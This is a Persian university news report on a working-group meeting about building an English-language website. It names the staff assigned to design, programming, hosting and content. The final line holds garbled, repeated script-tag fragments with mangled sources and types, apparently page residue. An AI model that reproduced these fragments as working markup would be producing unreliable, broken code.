دومین جلسه کارگروه طراحی وبسایت انگلیسی دانشگاه علوم پزشکی ابن سینا همدان

دومین جلسه کارگروه طراحی وبسایت انگلیسی دانشگاه علوم پزشکی ابن سینا همدان در دفتر روابط عمومی دانشگاه برگزار شد.

به گزارش روابط عمومی معونت توسعه مدیریت و منابع دانشگاه به نقل از پایگاه خبری وب‌دا در همدان، این جلسه با حضور مدیر و کارشناسان روابط عمومی دانشگاه و مدیر روابط بین‌الملل تشکیل شد.

در این جلسه ابتدا جعفر شاهرخی مدیر روابط عمومی ضمن تأکید بر اهمیت ایجاد سایت انگلیسی و حمایت از آن اظهار کرد: این جلسه نقطه عطفی در تاریخ اطلاع رسانی و ارتباطات دانشگاه است.

سپس دکتر ویدا سمیعی روال کار سایت انگلیسی را شرح داده و گزارشی از جلسه واحد MIS  دانشگاه را ارائه نمود، وی همچنین با اشاره به تاکید ریاست دانشگاه بر راه اندازی بخش انگلیسی سایت، تقسیم وظایف این مجموعه را تشریح کرد.

کارشناسان روابط عمومی نظرات خود را در این خصوص ارائه و پیشنهادات مفیدی برای کارآمدی سایت انگلیسی مطرح کردند.

در این جلسه مصوب شد، یحیی احمدی کارشناس روابط عمومی، مسئولیت طراحی و برنامه نویسی سایت را عهده‌دار شده و مهدی دهچالی مسئول IT روابط عمومی، پیگیری تحویل Host  از واحدMIS  دانشگاه را بر عهده گیرد.

داوود رسولی کارشناس روابط عمومی، مسئولیت طراحی گرافیک سایت را بر عهده گرفته و مسئولیت هماهنگی و پشتیبانی سایت و جمع‌آوری و بارگذاری اطلاعات اولیه به مسعود کریم خانی مسئول روابط عمومی معاونت توسعه مدیریت و منابع واگذار شد.

<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>